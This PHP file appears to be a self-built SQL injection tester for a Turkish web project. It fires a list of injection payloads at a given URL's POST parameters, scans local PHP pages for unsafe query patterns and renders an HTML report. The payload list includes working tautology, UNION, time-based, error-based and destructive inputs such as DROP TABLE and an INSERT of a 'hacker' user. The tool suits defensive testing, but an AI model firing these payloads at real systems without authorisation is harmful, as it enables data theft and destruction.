<?php

class SQLInjectionTester {
    private $test_payloads = [];
    private $test_results = [];
    private $db;
    
    public function __construct() {
        $this->initializePayloads();
        require_once __DIR__ . '/../config/database.php';
        $this->db = new Database();
    }
    
    private function initializePayloads() {
        $this->test_payloads = [
            "' OR '1'='1",
            "' OR 1=1--",
            "' OR 1=1#",
            "' OR 1=1/*",
            "admin'--",
            "admin'#",
            "admin'/*",
            "' OR 'x'='x",
            "' OR 'a'='a",
            "') OR ('1'='1",
            "') OR (1=1)--",
            
            "' UNION SELECT 1,2,3--",
            "' UNION SELECT NULL,NULL,NULL--",
            "' UNION ALL SELECT 1,2,3--",
            
            "'; WAITFOR DELAY '00:00:05'--",
            "' OR SLEEP(5)--",
            "'; SELECT SLEEP(5)--",
            
            "' AND 1=1--",
            "' AND 1=2--",
            "' AND (SELECT COUNT(*) FROM users) > 0--",
            
            "' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--",
            "' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
            
            "'; DROP TABLE test;--",
            "'; INSERT INTO users VALUES ('hacker','password');--",
            
            "' /**/OR/**/1=1--",
            "' %6f%72 1=1--",
            "' OR 1=1%00",
            "' OR 'a'='a' AND 'b'='b",
            
            "admin\\' OR 1=1--",
            "test\\'; DROP TABLE users;--"
        ];
    }
    
    public function testEndpoint($url, $parameters = []) {
        $results = [
            'url' => $url,
            'vulnerable' => false,
            'vulnerabilities' => [],
            'test_count' => 0,
            'error_responses' => [],
            'suspicious_responses' => []
        ];
        
        foreach ($this->test_payloads as $payload) {
            foreach ($parameters as $param) {
                $results['test_count']++;
                $test_result = $this->sendTestRequest($url, $param, $payload);
                
                if ($test_result['vulnerable']) {
                    $results['vulnerable'] = true;
                    $results['vulnerabilities'][] = [
                        'parameter' => $param,
                        'payload' => $payload,
                        'response' => $test_result['response'],
                        'evidence' => $test_result['evidence']
                    ];
                }
                
                if ($test_result['error']) {
                    $results['error_responses'][] = [
                        'parameter' => $param,
                        'payload' => $payload,
                        'error' => $test_result['error']
                    ];
                }
                
                if ($test_result['suspicious']) {
                    $results['suspicious_responses'][] = [
                        'parameter' => $param,
                        'payload' => $payload,
                        'response_time' => $test_result['response_time'],
                        'response_length' => $test_result['response_length']
                    ];
                }
            }
        }
        
        return $results;
    }
    
    private function sendTestRequest($url, $parameter, $payload) {
        $result = [
            'vulnerable' => false,
            'error' => false,
            'suspicious' => false,
            'response' => '',
            'evidence' => '',
            'response_time' => 0,
            'response_length' => 0
        ];
        
        try {
            $start_time = microtime(true);
            
            $post_data = [$parameter => $payload];
            $context = stream_context_create([
                'http' => [
                    'method' => 'POST',
                    'header' => 'Content-type: application/x-www-form-urlencoded',
                    'content' => http_build_query($post_data),
                    'timeout' => 10
                ]
            ]);
            
            $response = @file_get_contents($url, false, $context);
            $end_time = microtime(true);
            
            $result['response_time'] = $end_time - $start_time;
            $result['response_length'] = strlen($response);
            $result['response'] = $response;
            
            $error_patterns = [
                '/mysql_fetch_array\(\)/i',
                '/mysql_num_rows\(\)/i',
                '/mysql_error/i',
                '/warning.*mysql/i',
                '/you have an error in your sql syntax/i',
                '/quoted string not properly terminated/i',
                '/unclosed quotation mark/i',
                '/syntax error/i',
                '/ora-\d+/i',
                '/microsoft.*odbc.*sql/i',
                '/postgresql.*error/i'
            ];
            
            foreach ($error_patterns as $pattern) {
                if (preg_match($pattern, $response)) {
                    $result['vulnerable'] = true;
                    $result['evidence'] = 'SQL error message detected';
                    break;
                }
            }
            
            if ($result['response_time'] > 5) {
                $result['suspicious'] = true;
                if (strpos($payload, 'SLEEP') !== false || strpos($payload, 'WAITFOR') !== false) {
                    $result['vulnerable'] = true;
                    $result['evidence'] = 'Time-based SQL injection detected';
                }
            }
            
            if (strpos($payload, "1=1") !== false && strlen($response) > 0) {
                $false_payload = str_replace("1=1", "1=2", $payload);
                $false_post_data = [$parameter => $false_payload];
                $false_context = stream_context_create([
                    'http' => [
                        'method' => 'POST',
                        'header' => 'Content-type: application/x-www-form-urlencoded',
                        'content' => http_build_query($false_post_data),
                        'timeout' => 10
                    ]
                ]);
                
                $false_response = @file_get_contents($url, false, $false_context);
                
                if (strlen($response) != strlen($false_response)) {
                    $result['vulnerable'] = true;
                    $result['evidence'] = 'Boolean-based SQL injection detected';
                }
            }
            
        } catch (Exception $e) {
            $result['error'] = $e->getMessage();
        }
        
        return $result;
    }
    
    public function testDatabaseQueries() {
        $results = [
            'total_tests' => 0,
            'vulnerable_queries' => [],
            'safe_queries' => [],
            'errors' => []
        ];
        
        $test_queries = [
            "SELECT * FROM kullanicilar WHERE kullanici_adi = '%s'",
            "SELECT * FROM urunler WHERE urun_adi LIKE '%s'",
            "UPDATE kullanicilar SET son_giris = NOW() WHERE kullanici_id = %s",
            "DELETE FROM log WHERE tarih < '%s'"
        ];
        
        foreach ($test_queries as $query) {
            foreach ($this->test_payloads as $payload) {
                $results['total_tests']++;
                
                try {
                    $test_query = sprintf($query, $payload);
                    
                    if (strpos($query, '%s') !== false) {
                        $results['vulnerable_queries'][] = [
                            'query' => $query,
                            'payload' => $payload,
                            'reason' => 'String interpolation kullanılıyor'
                        ];
                    } else {
                        $results['safe_queries'][] = $query;
                    }
                    
                } catch (Exception $e) {
                    $results['errors'][] = [
                        'query' => $query,
                        'payload' => $payload,
                        'error' => $e->getMessage()
                    ];
                }
            }
        }
        
        return $results;
    }
    
    public function analyzeCode($directory = null) {
        if (!$directory) {
            $directory = __DIR__ . '/../pages/';
        }
        
        $results = [
            'scanned_files' => [],
            'vulnerable_patterns' => [],
            'safe_patterns' => [],
            'recommendations' => []
        ];
        
        $php_files = glob($directory . '*.php');
        
        foreach ($php_files as $file) {
            $results['scanned_files'][] = basename($file);
            $content = file_get_contents($file);
            
            $vulnerable_patterns = [
                '/mysql_query\s*\(\s*["\'].*\$/' => 'mysql_query with variable interpolation',
                '/mysqli_query\s*\(\s*.*\$/' => 'mysqli_query with variable interpolation',
                '/query\s*\(\s*["\'].*\$/' => 'PDO query with variable interpolation',
                '/SELECT.*\$.*FROM/' => 'Direct variable in SELECT statement',
                '/INSERT.*\$.*INTO/' => 'Direct variable in INSERT statement',
                '/UPDATE.*\$.*SET/' => 'Direct variable in UPDATE statement',
                '/DELETE.*\$.*FROM/' => 'Direct variable in DELETE statement',
                '/WHERE.*\$_GET/' => 'Direct $_GET usage in WHERE clause',
                '/WHERE.*\$_POST/' => 'Direct $_POST usage in WHERE clause'
            ];
            
            foreach ($vulnerable_patterns as $pattern => $description) {
                if (preg_match($pattern, $content)) {
                    $results['vulnerable_patterns'][] = [
                        'file' => basename($file),
                        'pattern' => $description,
                        'line' => $this->findLineNumber($content, $pattern)
                    ];
                }
            }
            
            $safe_patterns = [
                '/prepare\s*\(\s*["\']/' => 'Prepared statement usage',
                '/bindParam\s*\(/' => 'Parameter binding',
                '/bindValue\s*\(/' => 'Value binding',
                '/execute\s*\(\s*\[/' => 'Execute with parameters'
            ];
            
            foreach ($safe_patterns as $pattern => $description) {
                if (preg_match($pattern, $content)) {
                    $results['safe_patterns'][] = [
                        'file' => basename($file),
                        'pattern' => $description
                    ];
                }
            }
        }
        
        if (!empty($results['vulnerable_patterns'])) {
            $results['recommendations'][] = 'Prepared statements kullanın';
            $results['recommendations'][] = 'Kullanıcı girdilerini doğrudan SQL sorgularında kullanmayın';
            $results['recommendations'][] = 'Input validation ve sanitization uygulayın';
        }
        
        return $results;
    }
    
    private function findLineNumber($content, $pattern) {
        $lines = explode("\n", $content);
        foreach ($lines as $line_num => $line) {
            if (preg_match($pattern, $line)) {
                return $line_num + 1;
            }
        }
        return 0;
    }
    
    public function generateHTMLReport($test_results) {
        $html = '<div class="sql-injection-report">';
        $html .= '<h3>SQL Injection Test Raporu</h3>';
        
        if (isset($test_results['url'])) {
            $html .= '<h4>Endpoint Test Sonuçları</h4>';
            $html .= '<p><strong>Test Edilen URL:</strong> ' . htmlspecialchars($test_results['url']) . '</p>';
            $html .= '<p><strong>Toplam Test:</strong> ' . $test_results['test_count'] . '</p>';
            $html .= '<p><strong>Durum:</strong> ';
            
            if ($test_results['vulnerable']) {
                $html .= '<span class="badge bg-danger">VULNERABLE</span>';
            } else {
                $html .= '<span class="badge bg-success">SAFE</span>';
            }
            $html .= '</p>';
            
            if (!empty($test_results['vulnerabilities'])) {
                $html .= '<h5>Bulunan Açıklar</h5>';
                $html .= '<div class="table-responsive">';
                $html .= '<table class="table table-striped">';
                $html .= '<thead><tr><th>Parametre</th><th>Payload</th><th>Kanıt</th></tr></thead>';
                $html .= '<tbody>';
                
                foreach ($test_results['vulnerabilities'] as $vuln) {
                    $html .= '<tr>';
                    $html .= '<td>' . htmlspecialchars($vuln['parameter']) . '</td>';
                    $html .= '<td><code>' . htmlspecialchars($vuln['payload']) . '</code></td>';
                    $html .= '<td>' . htmlspecialchars($vuln['evidence']) . '</td>';
                    $html .= '</tr>';
                }
                
                $html .= '</tbody></table>';
                $html .= '</div>';
            }
        } else {
            $html .= '<h4>Kod Analizi Sonuçları</h4>';
            $html .= '<p><strong>Taranan Dosyalar:</strong> ' . count($test_results['scanned_files'] ?? []) . '</p>';
            
            if (!empty($test_results['vulnerable_patterns'])) {
                $html .= '<h5>Güvenlik Açıkları</h5>';
                $html .= '<div class="table-responsive">';
                $html .= '<table class="table table-striped">';
                $html .= '<thead><tr><th>Dosya</th><th>Açıklama</th><th>Satır</th></tr></thead>';
                $html .= '<tbody>';
                
                foreach ($test_results['vulnerable_patterns'] as $pattern) {
                    $html .= '<tr>';
                    $html .= '<td>' . htmlspecialchars($pattern['file']) . '</td>';
                    $html .= '<td>' . htmlspecialchars($pattern['pattern']) . '</td>';
                    $html .= '<td>' . $pattern['line'] . '</td>';
                    $html .= '</tr>';
                }
                
                $html .= '</tbody></table>';
                $html .= '</div>';
            }
            
            if (!empty($test_results['recommendations'])) {
                $html .= '<h5>Öneriler</h5>';
                $html .= '<ul>';
                foreach ($test_results['recommendations'] as $recommendation) {
                    $html .= '<li>' . htmlspecialchars($recommendation) . '</li>';
                }
                $html .= '</ul>';
            }
        }
        
        $html .= '</div>';
        return $html;
    }
}
?>